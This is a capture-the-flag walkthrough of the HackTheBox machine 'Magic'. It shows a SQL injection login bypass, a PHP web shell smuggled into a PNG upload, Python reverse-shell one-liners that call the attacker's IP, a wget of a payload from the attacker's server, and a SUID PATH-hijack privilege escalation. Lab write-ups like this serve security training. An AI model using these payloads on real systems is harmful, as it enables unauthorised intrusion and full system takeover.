Magic HackTheBox Walkthrough
This is Magic HackTheBox machine walkthrough. In this writeup I have demonstrated step by step procedure how I got rooted to the this HTB machine. Magic HTB machine is a Linux machine, given security level medium by its maker. And has been assigned IP address
10.10.10.185. Now I am going to show you my steps. First of all, connect your local machine with VPN and confirm its connectivity by pinging the IP address 10.10.10.185.
As usual, I began by scanning the IP address so that I could get some starting point.
Nmap [a port scanner] gave the following result
$ nmap -sV -sC -oA scan 10.10.10.185
Nmap revealed that port 22 and 80 is open.
OpenSSH 7.6p1 is running on port 22 and
Apache2 web server is running on port 80. After going to URL
http://10.10.10.185/login.php found login page. Tried to login with default creds like
password but nothing worked.
Login Screen Bypass
Just tried some
SQL login screen bypass payloads in the login form. Hoo la, successfully
bypassed the login screen and logged in without Login ID and Password. SQL injection payload is
' OR 1=1 --
' OR 1=1 --
After login, redirected to
Tried to upload an image file and successfully uploaded it. The uploaded image can be accessed at URL
http://10.10.10.185/images/uploads/my_uploded_image.png. So tried to upload a file with extension
php but got error
Sorry, only JPG, JPEG & PNG files are allowed. This may be due to image file extension check or signature check in image content.
PHP Shell Upload
To bypass this restriction I uploaded an image file with the extension png. And before uploading intercepted the request in
Burp Suite. Removed all the image payloads except first two lines [to maintain its signature remains present]. And entered our custom php
command execution payload after second line, as shown below.
<?php echo system($_GET['cmd'])>
Also, changed the filename from
fb.php.png because we want to execute out payload as php document. And send the request. Now our shell is uploaded and can be accessed at the URL
To get clear result switched to
view-source page of the URL
http://10.10.10.185/images/uploads/fb.php.png and appended
?cmd= to the URL. So final URL to execute command becomes view-source:http://10.10.10.185/images/uploads/fb.php.png? cmd=OS_command_here.
Checking Command Injection
Once we have uploaded a shell our next step should be to confirm command execution by running some commands. Used
id command to confirm command execution. Successfully executed the command.
After confirmation my next step is to get a
shell using some,
one liner shell code. I am using
python one liner.
'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.39"1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
You can get more reverse shell one liner from here. Changed the ip address in python one liner with my IP and started
netcat listener on port
$ nc -nvlp 1234
And then executed the below command in URL.
Getting Remote Shell
?cmd=python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.39"1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Successfully got a shell.
Upgrade the Shell to fully qualified Linux shell
Upgrading the Shell
$ python3 -c ‘import pty;pty.spawn("/bin/bash")’
$ CTRT + Z # to background the shell
$ stty raw -echo
Plus press two times enter to foreground the shell
$ export TERM=xterm-256color
Magic machine has one user
/home/ directory. After some enumeration got a file
/var/www/Magic/ directory. It contains database credentials.
Tried to switch to theseus using
$su theseus with password
iamkingtheseus but, failed.
Checking Listening Ports
$netstat -punta to check whether any service is running locally which was not listed by nmap.
Got that port 3306 is listening. There may a SQL server running over this port. To confirm the service, checked the running process by
$ps aux | grep sql which show that
mysqld demon is running. Tried to use command
$mysql to dump database content but, no mysql command found. No idea how to list database content locally on same server. If it would be GUI application then I would use phpmyadmin or similar tools.
how to dump mysql database content locally using Terminal and got this official documentation from MySQL.
Dumping Dbase Content
To dump database content used tool
$ mysqldump -utheseus -piamkingtheseus --all-databases
Credential extracted from all databases is
Switched the user to theseus with the credential theseus: Th3s3usW4sK1ng
$ su theseus
Capture User Flag
$ cd ~
$ cat user.txt
Finding PrivEsc Vector
Linpeas.sh a post exploitation enumeration script revealed that
custom SUID binary, can be modified to escalate privilege. So here, our privilege escalation vector may be
SUID binary exploitation.
Let’s know something about sysinfo command. When sysinfo command is executed it calls four other commands to print h/w info, disk info, CPU info and memory usage info. Among these command
$fdisk command requires root privilege to get executed. Since sysinfo is a custom SUID binary owned by root so, whenever it is executed by theseus, theseus is given root privilege to execute this command.
lshw -short[Show h/w info]
fdisk -l[Shows disk info and require root privilege to run]
cat /proc/cpuinfo[Print CPU info]
free -h[Print Memory Usage info]
I have executed these commands locally with local user to confirm which command requires root privilege to run.
Also on magic machine
$fdisk -l gave me permission denied.
For more info about Privilege Escalation using SUID Binary check this interesting article.
Exploit SUID Binary
To exploit this SUID binary I did the following
1. Created a file named
fdisk having content of our python reverse shell
2. Started python HTTP server locally
$ python3 -m http.server 80
3. Transferred this file to magic htb machine
$ wget 10.10.14.39/fdisk
4. Changed the permission to 755
$ chmod 755 fdisk
/tmp/ directory to path variable
$ export PATH=/tmp:$PATH
6. Started netcat listener on our machine locally.
$nc -nvlp 2345
7. Finally, executed
And we are root now.
Capture Root Flag
$ cd /root/
$ cat root.txt
Learnt a lot after hunting this HackTheBox machine. Hope you guys have also learnt something new from this walkthrough. Having any issue let me know in the comment section. For any suggestion feel free to write us at [email protected].
Read more Linux HackTheBox Machine Walkthrough at https://ethicalhacs.com/